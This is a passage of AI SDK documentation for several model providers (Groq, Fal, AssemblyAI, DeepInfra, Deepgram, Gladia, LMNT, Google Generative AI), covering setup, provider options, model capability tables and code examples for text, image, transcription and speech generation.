Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.groq.com/openai/v1.
apiKey string

API key that is being sent using the Authorization header. It defaults to the GROQ_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create Groq models using a provider instance. The first argument is the model id, e.g. gemma2-9b-it.

const model = groq('gemma2-9b-it');

Reasoning Models

Groq offers several reasoning models such as qwen-qwq-32b and deepseek-r1-distill-llama-70b. You can configure how the reasoning is exposed in the generated text by using the reasoningFormat option. It supports the options parsed, hidden, and raw.

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const result = await generateText({
  model: groq('qwen-qwq-32b'),
  providerOptions: {
    groq: { reasoningFormat: 'parsed' },
  },
  prompt: 'How many "r"s are in the word "strawberry"?',
});

Only Groq reasoning models support the reasoningFormat option.

Example

You can use Groq language models to generate text with the generateText function:

import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';

const { text } = await generateText({
  model: groq('gemma2-9b-it'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/llama-4-scout-17b-16e-instruct`
`gemma2-9b-it`
`llama-3.3-70b-versatile`
`llama-3.1-8b-instant`
`llama-guard-3-8b`
`llama3-70b-8192`
`llama3-8b-8192`
`mixtral-8x7b-32768`
`qwen-qwq-32b`
`mistral-saba-24b`
`qwen-2.5-32b`
`deepseek-r1-distill-qwen-32b`
`deepseek-r1-distill-llama-70b`

Transcription Models

You can create models that call the Groq transcription API using the .transcription() factory method.

The first argument is the model id e.g. whisper-large-v3.

const model = groq.transcription('whisper-large-v3');

import { experimental_transcribe as transcribe } from 'ai';
import { groq } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: { groq: { language: 'en' } },
});

The following provider options are available:

timestampGranularities string[] The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
language string The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
prompt string An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
temperature number The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper-large-v3`
`whisper-large-v3-turbo`
`distil-whisper-large-v3-en`

title: Fal description: Learn how to use Fal AI models with the AI SDK.

Fal Provider

Fal AI provides a generative media platform for developers with lightning-fast inference capabilities. Their platform offers optimized performance for running diffusion models, with speeds up to 4x faster than alternatives.

Setup

The Fal provider is available via the @ai-sdk/fal module. You can install it with

Provider Instance

You can import the default provider instance fal from @ai-sdk/fal:

import { fal } from '@ai-sdk/fal';

If you need a customized setup, you can import createFal and create a provider instance with your settings:

import { createFal } from '@ai-sdk/fal';

const fal = createFal({
  apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Fal provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
apiKey string

API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Image Models

You can create Fal image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';

const { image } = await generateImage({
  model: fal.image('fal-ai/fast-sdxl'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI documentation.

Model	Description
`fal-ai/fast-sdxl`	High-speed SDXL model optimized for quick inference with up to 4x faster speeds
`fal-ai/flux-pro/kontext`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, seamlessly enabling targeted, local edits and complex transformations of entire scenes
`fal-ai/flux-pro/kontext/max`	FLUX.1 Kontext [max] with greatly improved prompt adherence and typography generation, meeting premium consistency for editing without compromise on speed
`fal-ai/flux-lora`	Super fast endpoint for the FLUX.1 [dev] model with LoRA support, enabling rapid and high-quality image generation using pre-trained LoRA adaptations.
`fal-ai/flux-pro/v1.1-ultra`	Professional-grade image generation with up to 2K resolution and enhanced photorealism
`fal-ai/ideogram/v2`	Specialized for high-quality posters and logos with exceptional typography handling
`fal-ai/recraft-v3`	SOTA in image generation with vector art and brand style capabilities
`fal-ai/stable-diffusion-3.5-large`	Advanced MMDiT model with improved typography and complex prompt understanding
`fal-ai/hyper-sdxl`	Performance-optimized SDXL variant with enhanced creative capabilities

Fal models support the following aspect ratios:

1:1 (square HD)
16:9 (landscape)
9:16 (portrait)
4:3 (landscape)
3:4 (portrait)
16:10 (1280x800)
10:16 (800x1280)
21:9 (2560x1080)
9:21 (1080x2560)

Key features of Fal models include:

Up to 4x faster inference speeds compared to alternatives
Optimized by the Fal Inference Engine™
Support for real-time infrastructure
Cost-effective scaling with pay-per-use pricing
LoRA training capabilities for model personalization

Modify Image

Transform existing images using text prompts.

// Example: Modify existing image
await generateImage({
  model: fal.image('fal-ai/flux-pro/kontext'),
  prompt: 'Put a donut next to the flour.',
  providerOptions: {
    fal: {
      image_url:
        'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
    },
  },
});

Advanced Features

Fal's platform offers several advanced capabilities:

Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
LoRA Training: Train and personalize models in under 5 minutes
Real-time Infrastructure: Enable new user experiences with fast inference times
Scalable Architecture: Scale to thousands of GPUs when needed

For more details about Fal's capabilities and features, visit the Fal AI documentation.

Transcription Models

You can create models that call the Fal transcription API using the .transcription() factory method.

The first argument is the model id without the fal-ai/ prefix e.g. wizper.

const model = fal.transcription('wizper');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the batchSize option will increase the number of audio chunks processed in parallel.

import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('audio.mp3'),
  providerOptions: { fal: { batchSize: 10 } },
});

The following provider options are available:

language string Language of the audio file. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
diarize boolean Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
chunkLevel string Level of the chunks to return. Either 'segment' or 'word'. Default value: "word" Optional.
version string Version of the model to use. All models are Whisper large variants. Default value: "3" Optional.
batchSize number Batch size for processing. Default value: 64 Optional.
numSpeakers number Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`whisper`
`wizper`

title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.

AssemblyAI Provider

The AssemblyAI provider contains language model support for the AssemblyAI transcription API.

Setup

The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with

Provider Instance

You can import the default provider instance assemblyai from @ai-sdk/assemblyai:

import { assemblyai } from '@ai-sdk/assemblyai';

If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:

import { createAssemblyAI } from '@ai-sdk/assemblyai';

const assemblyai = createAssemblyAI({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the AssemblyAI provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the AssemblyAI transcription API using the .transcription() factory method.

The first argument is the model id e.g. best.

const model = assemblyai.transcription('best');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.

import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('audio.mp3'),
  providerOptions: { assemblyai: { contentSafety: true } },
});

The following provider options are available:

audioEndAt number

End time of the audio in milliseconds. Optional.
audioStartFrom number

Start time of the audio in milliseconds. Optional.
autoChapters boolean

Whether to automatically generate chapters for the transcription. Optional.
autoHighlights boolean

Whether to automatically generate highlights for the transcription. Optional.
boostParam enum

Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
contentSafety boolean

Whether to enable content safety filtering. Optional.
contentSafetyConfidence number

Confidence threshold for content safety filtering (25-100). Optional.
customSpelling array of objects

Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
disfluencies boolean

Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
entityDetection boolean

Whether to detect entities in the transcription. Optional.
filterProfanity boolean

Whether to filter profanity in the transcription. Optional.
formatText boolean

Whether to format the text in the transcription. Optional.
iabCategories boolean

Whether to include IAB categories in the transcription. Optional.
languageCode string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
languageConfidenceThreshold number

Confidence threshold for language detection. Optional.
languageDetection boolean

Whether to enable language detection. Optional.
multichannel boolean

Whether to process multiple audio channels separately. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
redactPii boolean

Whether to redact personally identifiable information. Optional.
redactPiiAudio boolean

Whether to redact PII in the audio file. Optional.
redactPiiAudioQuality enum

Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
redactPiiPolicies array of enums

Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
redactPiiSub enum

Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
sentimentAnalysis boolean

Whether to perform sentiment analysis on the transcription. Optional.
speakerLabels boolean

Whether to label different speakers in the transcription. Optional.
speakersExpected number

Expected number of speakers in the audio. Optional.
speechThreshold number

Threshold for speech detection (0-1). Optional.
summarization boolean

Whether to generate a summary of the transcription. Optional.
summaryModel enum

Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
summaryType enum

Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
topics array of strings

List of topics to detect in the transcription. Optional.
webhookAuthHeaderName string

Name of the authentication header for webhook requests. Optional.
webhookAuthHeaderValue string

Value of the authentication header for webhook requests. Optional.
webhookUrl string

URL to send webhook notifications to. Optional.
wordBoost array of strings

List of words to boost in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`best`
`nano`

title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.

DeepInfra Provider

The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.

Setup

The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with:

Provider Instance

You can import the default provider instance deepinfra from @ai-sdk/deepinfra:

import { deepinfra } from '@ai-sdk/deepinfra';

If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:

import { createDeepInfra } from '@ai-sdk/deepinfra';

const deepinfra = createDeepInfra({
  apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});

You can use the following optional settings to customize the DeepInfra provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1/openai.
apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create language models using a provider instance. The first argument is the model ID, for example:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';

const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

DeepInfra language models can also be used in the streamText function (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`
`meta-llama/Llama-4-Scout-17B-16E-Instruct`
`meta-llama/Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Meta-Llama-3.1-405B-Instruct`
`meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-70B-Instruct`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.2-11B-Vision-Instruct`
`meta-llama/Llama-3.2-90B-Vision-Instruct`
`mistralai/Mixtral-8x7B-Instruct-v0.1`
`deepseek-ai/DeepSeek-V3`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`deepseek-ai/DeepSeek-R1-Turbo`
`nvidia/Llama-3.1-Nemotron-70B-Instruct`
`Qwen/Qwen2-7B-Instruct`
`Qwen/Qwen2.5-72B-Instruct`
`Qwen/Qwen2.5-Coder-32B-Instruct`
`Qwen/QwQ-32B-Preview`
`google/codegemma-7b-it`
`google/gemma-2-9b-it`
`microsoft/WizardLM-2-8x22B`

Image Models

You can create DeepInfra image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model-specific options

You can pass model-specific parameters using the providerOptions.deepinfra field:

import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    deepinfra: {
      num_inference_steps: 30, // Control the number of denoising steps (1-50)
    },
  },
});

Model Capabilities

For models supporting aspect ratios, the following ratios are typically supported: 1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21

For models supporting size parameters, dimensions must typically be:

Multiples of 32
Width and height between 256 and 1440 pixels
Default size is 1024x1024

Model	Dimensions Specification	Notes
`stabilityai/sd3.5`	Aspect Ratio	Premium quality base model, 8B parameters
`black-forest-labs/FLUX-1.1-pro`	Size	Latest state-of-art model with superior prompt following
`black-forest-labs/FLUX-1-schnell`	Size	Fast generation in 1-4 steps
`black-forest-labs/FLUX-1-dev`	Size	Optimized for anatomical accuracy
`black-forest-labs/FLUX-pro`	Size	Flagship Flux model
`stabilityai/sd3.5-medium`	Aspect Ratio	Balanced 2.5B parameter model
`stabilityai/sdxl-turbo`	Aspect Ratio	Optimized for fast generation

For more details and pricing information, see the DeepInfra text-to-image models page.

title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.

Deepgram Provider

The Deepgram provider contains language model support for the Deepgram transcription API.

Setup

The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with

Provider Instance

You can import the default provider instance deepgram from @ai-sdk/deepgram:

import { deepgram } from '@ai-sdk/deepgram';

If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:

import { createDeepgram } from '@ai-sdk/deepgram';

const deepgram = createDeepgram({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Deepgram provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Deepgram transcription API using the .transcription() factory method.

The first argument is the model id e.g. nova-3.

const model = deepgram.transcription('nova-3');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: { deepgram: { summarize: true } },
});

The following provider options are available:

language string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
smartFormat boolean

Whether to apply smart formatting to the transcription. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
paragraphs boolean

Whether to format the transcription into paragraphs. Optional.
summarize enum | boolean

Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
topics boolean

Whether to detect topics in the transcription. Optional.
intents boolean

Whether to detect intents in the transcription. Optional.
sentiment boolean

Whether to perform sentiment analysis on the transcription. Optional.
detectEntities boolean

Whether to detect entities in the transcription. Optional.
redact string | array of strings

Specifies what content to redact from the transcription. Optional.
replace string

Replacement string for redacted content. Optional.
search string

Search term to find in the transcription. Optional.
keyterm string

Key terms to identify in the transcription. Optional.
diarize boolean

Whether to identify different speakers in the transcription. Defaults to true. Optional.
utterances boolean

Whether to segment the transcription into utterances. Optional.
uttSplit number

Threshold for splitting utterances. Optional.
fillerWords boolean

Whether to include filler words (um, uh, etc.) in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`nova-3` (+ variants)
`nova-2` (+ variants)
`nova` (+ variants)
`enhanced` (+ variants)
`base` (+ variants)

title: Gladia description: Learn how to use the Gladia provider for the AI SDK.

Gladia Provider

The Gladia provider contains language model support for the Gladia transcription API.

Setup

The Gladia provider is available in the @ai-sdk/gladia module. You can install it with

Provider Instance

You can import the default provider instance gladia from @ai-sdk/gladia:

import { gladia } from '@ai-sdk/gladia';

If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:

import { createGladia } from '@ai-sdk/gladia';

const gladia = createGladia({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Gladia provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Gladia transcription API using the .transcription() factory method.

const model = gladia.transcription();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: { gladia: { summarize: true } },
});

The following provider options are available:

contextPrompt string

Context to feed the transcription model with for possible better accuracy. Optional.
customVocabulary boolean | any[]

Custom vocabulary to improve transcription accuracy. Optional.
customVocabularyConfig object

Configuration for custom vocabulary. Optional.
- vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
- defaultIntensity number
detectLanguage boolean

Whether to automatically detect the language. Optional.
enableCodeSwitching boolean

Enable code switching for multilingual audio. Optional.
codeSwitchingConfig object

Configuration for code switching. Optional.
- languages string[]
language string

Specify the language of the audio. Optional.
callback boolean

Enable callback when transcription is complete. Optional.
callbackConfig object

Configuration for callback. Optional.
- url string
- method 'POST' | 'PUT'
subtitles boolean

Generate subtitles from the transcription. Optional.
subtitlesConfig object

Configuration for subtitles. Optional.
- formats Array<'srt' | 'vtt'>
- minimumDuration number
- maximumDuration number
- maximumCharactersPerRow number
- maximumRowsPerCaption number
- style 'default' | 'compliance'
diarization boolean

Enable speaker diarization. Defaults to true. Optional.
diarizationConfig object

Configuration for diarization. Optional.
- numberOfSpeakers number
- minSpeakers number
- maxSpeakers number
- enhanced boolean
translation boolean

Enable translation of the transcription. Optional.
translationConfig object

Configuration for translation. Optional.
- targetLanguages string[]
- model 'base' | 'enhanced'
- matchOriginalUtterances boolean
summarization boolean

Enable summarization of the transcription. Optional.
summarizationConfig object

Configuration for summarization. Optional.
- type 'general' | 'bullet_points' | 'concise'
moderation boolean

Enable content moderation. Optional.
namedEntityRecognition boolean

Enable named entity recognition. Optional.
chapterization boolean

Enable chapterization of the transcription. Optional.
nameConsistency boolean

Enable name consistency in the transcription. Optional.
customSpelling boolean

Enable custom spelling. Optional.
customSpellingConfig object

Configuration for custom spelling. Optional.
- spellingDictionary Record<string, string[]>
structuredDataExtraction boolean

Enable structured data extraction. Optional.
structuredDataExtractionConfig object

Configuration for structured data extraction. Optional.
- classes string[]
sentimentAnalysis boolean

Enable sentiment analysis. Optional.
audioToLlm boolean

Enable audio to LLM processing. Optional.
audioToLlmConfig object

Configuration for audio to LLM. Optional.
- prompts string[]
customMetadata Record<string, any>

Custom metadata to include with the request. Optional.
sentences boolean

Enable sentence detection. Optional.
displayMode boolean

Enable display mode. Optional.
punctuationEnhanced boolean

Enable enhanced punctuation. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`Default`

title: LMNT description: Learn how to use the LMNT provider for the AI SDK.

LMNT Provider

The LMNT provider contains language model support for the LMNT transcription API.

Setup

The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with

Provider Instance

You can import the default provider instance lmnt from @ai-sdk/lmnt:

import { lmnt } from '@ai-sdk/lmnt';

If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:

import { createLMNT } from '@ai-sdk/lmnt';

const lmnt = createLMNT({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the LMNT provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the LMNT speech API using the .speech() factory method.

The first argument is the model id e.g. aurora.

const model = lmnt.speech('aurora');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying a voice to use for the generated audio.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  providerOptions: { lmnt: { language: 'en' } },
});

Provider Options

The LMNT provider accepts the following options:

model 'aurora' | 'blizzard'

The LMNT model to use. Defaults to 'aurora'.
language 'auto' | 'en' | 'es' | 'pt' | 'fr' | 'de' | 'zh' | 'ko' | 'hi' | 'ja' | 'ru' | 'it' | 'tr'

The language to use for speech synthesis. Defaults to 'auto'.
format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'

The audio format to return. Defaults to 'mp3'.
sampleRate number

The sample rate of the audio in Hz. Defaults to 24000.
speed number

The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
seed number

An optional seed for deterministic generation.
conversational boolean

Whether to use a conversational style. Defaults to false.
length number

Maximum length of the audio in seconds. Maximum value is 300.
topP number

Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
temperature number

Temperature parameter for sampling. Must be at least 0. Defaults to 1.

Model Capabilities

Model	Instructions
`aurora`
`blizzard`

title: Google Generative AI description: Learn how to use Google Generative AI Provider.

Google Generative AI Provider

The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.

Setup

The Google provider is available in the @ai-sdk/google module. You can install it with

Provider Instance

You can import the default provider instance google from @ai-sdk/google:

import { google } from '@ai-sdk/google';

If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:

import { createGoogleGenerativeAI } from '@ai-sdk/google';

const google = createGoogleGenerativeAI({
  // custom settings
});

You can use the following optional settings to customize the Google Generative AI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
apiKey string

API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Language Models

You can create models that call the Google Generative AI API using the provider instance. The first argument is the model id, e.g. gemini-1.5-pro-latest. The models support tool calls and some have multi-modal capabilities.

const model = google('gemini-1.5-pro-latest');

Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

const model = google('gemini-1.5-pro-latest', {
  safetySettings: [
    { category: 'HARM_CATEGORY_UNSPECIFIED', threshold: 'BLOCK_LOW_AND_ABOVE' },
  ],
});

The following optional settings are available for Google Generative AI models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE

Further configuration can be done using Google Generative AI provider options. You can validate the provider options using the GoogleGenerativeAIProviderOptions type.

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-1.5-pro-latest'),
  providerOptions: {
    google: {
      responseModalities: ['TEXT', 'IMAGE'],
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  // ...
});

Another example showing the use of provider options to specify the thinking budget for a Google Generative AI thinking model:

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-2.5-flash-preview-04-17'),
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingBudget: 2048,
      },
    } satisfies GoogleGenerativeAIProviderOptions,
  },
  // ...
});

The following provider options are available:

responseModalities string[] The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
thinkingConfig { thinkingBudget: number; }

Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
- thinkingBudget number
  
  Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Must be an integer in the range 0 to 24576. Setting it to 0 disables thinking. Budgets from 1 to 1024 tokens will be set to 1024. For more information see Google Generative AI documentation.

You can use Google Generative AI language models to generate text with the generateText function:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-1.5-pro-latest'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Generative AI language models can also be used in the streamText, generateObject, and streamObject functions (see AI SDK Core).

File Inputs

The Google Generative AI provider supports file inputs, e.g. PDF files.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-1.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mimeType: 'application/pdf',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

Gemini 2.5 models automatically provide cache cost savings without needing to create an explicit cache. When you send requests that share common prefixes with previous requests, you'll receive a 75% token discount on cached content.

To maximize cache hits with implicit caching:

Keep content at the beginning of requests consistent
Add variable content (like user questions) at the end of prompts
Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, response } = await generateText({
  model: google('gemini-2.5-pro'),
